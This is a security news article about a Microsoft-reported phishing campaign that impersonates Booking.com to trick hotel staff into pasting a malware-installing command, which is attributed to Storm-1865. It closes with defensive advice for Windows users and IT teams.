Beware: Booking.com Phishing Scam Targets Hotels with Sophisticated Malware

The hospitality industry isn’t the only one facing a roster of challenges these days—cybercriminals are checking in too. A recent alert from Microsoft Threat Intelligence has uncovered a sophisticated phishing campaign impersonating Booking.com that targets hotels, resorts, and other businesses, aiming to pilfer payment details and sensitive personal data. Let’s break down how this campaign works, the malware it employs, and what Windows users can do to fortify their defenses.

---

An Insider Look at the Booking.com Impersonation Scam​

At first glance, the phishing emails mimic legitimate Booking.com notifications. They discuss guest reviews and prompt account verifications to create the illusion of authenticity. The attackers have perfected the art of social engineering by exploiting the trust hotels and hospitality businesses place in well-known brands. But the real peril emerges once an unsuspecting user engages with the content.

• Initial Bait: The scam begins with a Booking.com-themed email that appears routine—a familiar invitation to review a recent stay or verify account details.
• Redirect to a Fake CAPTCHA: Upon clicking, the recipient is sent to a fake CAPTCHA page. While many might expect to simply validate their identity, these pages are designed to lull the victim into a false sense of security.
• Command Prompt Trap: If the victim successfully solves the CAPTCHA puzzle, they’re unexpectedly met with an error message. However, this isn't your ordinary error—it comes with a specific solution, instructing the user to copy a command and paste it into the Run program. Once executed, the command deploys malware stealthily onto the system.

This clever ruse exploits human curiosity and trust, demonstrating how even routine IT interactions can be subverted into security nightmares.

---

The Malware Arsenal Unleashed​

Executing the command doesn’t remedy any “issues” on the computer. Instead, it triggers the download of one of several malware strains, each engineered to serve a unique malicious purpose:

• XWorm: While details on XWorm are emerging, this variant is believed to function similarly to its malware kin that focus on system compromise and data exfiltration.
• Lumma Stealer: As an infostealer, Lumma targets Windows devices to extract login credentials, browser-stored secrets, and further personal or business data. Imagine losing not just your keys but every spare copy hidden under your digital doormat.
• VenomRAT: Perhaps the most alarming of the trio, VenomRAT is a remote access trojan that grants attackers unfettered access to the infected device. This means that once the malware is in place, criminals could ransack sensitive directories and monitor system activities almost in real time.

What’s particularly insidious about this campaign is its modular nature. The phishing message could install any combination of these malware strains, allowing attackers to tailor their assault based on the value of the harvested data.

---

Decoding the “ClickFix” Phishing Tactic​

This isn’t the first time cybercriminals have employed the ClickFix method, but its evolution is indeed noteworthy. Traditionally, similar scams involved a direct approach where a pop-up, often impersonating an IT technician, would alert users to an urgent computer issue. In this new rendition:

• User-Driven Execution: Instead of a remote attack where users are passively hacked into, the scam nudges the victim to perform a series of actions—solving a CAPTCHA and copy-pasting commands.
• Less Obvious Malware Installation: Rather than bluntly grabbing control, the process surreptitiously installs malicious software after the user ostensibly “fixes” an error. This adds an extra psychological layer of deception, as the user believes they are resolving a genuine system problem.

The click-driven nature of the campaign reduces the immediate suspicion that typically accompanies direct malware downloads. It’s a masterclass in manipulating both the human element and technical vulnerabilities.

---

Meet the Threat Actor: Storm-1865​

Microsoft attributes this alarming campaign to a threat actor designated Storm-1865—a group whose tactics seem to have emerged quite recently. While there isn’t an extensive track record for Storm-1865, their methodology speaks volumes about their intent and capability:

• Rapid Evolution: The campaign is described as “rapidly evolving,” a characteristic that suggests the attackers are continuously refining their techniques to avoid detection.
• Targeted Attacks: By focusing on the hospitality sector, Storm-1865 zeroes in on businesses with lucrative data, such as payment details and personal guest information.
• Global Reach with Local Impact: Though the origins might be obscure, the campaign’s global targeting amplifies the risk. A compromised hotel’s data could lead to international wire fraud and significant reputational damage.

This emergent group illustrates a growing trend where cybercriminals are no longer satisfied with mere data theft—they’re constructing elaborate traps that use familiar brands to breach trust and security barriers.

---

Implications for Windows Users and IT Security​

For individuals and businesses using Windows systems, this development is a stark reminder that cybersecurity vigilance isn’t optional—it’s essential. The phishing campaign not only reaffirms the need for robust network defenses but also highlights the importance of user education in preventing social engineering attacks.

Key Precautions to Consider:​

• Verify Email Authenticity: Always double-check the sender’s email address. Even if the design mimics a known brand like Booking.com, slight discrepancies can be a major red flag.
• Avoid Running Unsolicited Commands: Never copy and paste commands from an email or web prompt unless you are entirely sure of their legitimacy. When in doubt, consult with IT.
• Implement Multi-Factor Authentication (MFA): By adding another layer of security beyond just passwords, MFA can help prevent unauthorized access even if credentials are stolen.
• Regular Windows Updates: Keep your operating system and security software up-to-date. Patches and updates often include critical fixes for known vulnerabilities that could be exploited by malware.
• User Education and Training: Continuous cybersecurity training can empower employees to recognize phishing attempts and take appropriate action.

Practical Steps for Teams:​

1. Conduct Internal Audits: Regularly review IT policies and systems to identify and mitigate potential vulnerabilities.
2. Enable Real-Time Monitoring: Use endpoint detection and response (EDR) tools on Windows systems to spot unusual activities early.
3. Establish Incident Response Protocols: Have clear guidelines in place for reporting and responding to suspected phishing attempts.
4. Use Virtualized Environments: Running untrusted commands or suspicious attachments in sandboxed environments can limit damage if a breach occurs.

As cyberattacks evolve, so must the defensive measures. This campaign’s ingenuity serves as a cautionary tale—one where the attacker leverages human behavior as effectively as technical exploits.

---

Broader Cybersecurity Trends and Final Thoughts​

In our interconnected world, no industry is immune to cyber threats. The evolution of the ClickFix phishing technique underscores a broader trend: attackers are constantly innovating, learning from past mistakes, and adapting their strategies to exploit trust in established brands. For the hospitality industry and other sectors alike, this means balancing customer convenience with robust cybersecurity defenses has never been more critical.
Rhetorically, one might ask: How many familiar brands could be next on the criminals’ hit list? And is our reliance on trusted names leaving us more vulnerable than ever before? Such questions underline the pressing need for proactive measures in our cybersecurity posture.
For Windows users, the impending takeaway is clear—stay informed, remain skeptical of unsolicited requests, and ensure that regular security protocols are anyone’s best line of defense against these evolving threats.
In conclusion, the new phishing campaign impersonating Booking.com is more than just another scam—it’s a sophisticated assault that integrates technical deception with social manipulation. As Storm-1865 tests the waters with this rapidly evolving tactic, both individuals and businesses are urged to bolster their cybersecurity defenses, remain vigilant in verifying the authenticity of unexpected communications, and adopt best practices that shield sensitive data from nefarious actors.
Stay secure, stay updated, and above all, trust—but verify.

---

Source: TechRadar Microsoft warns about a new phishing campaign impersonating Booking.com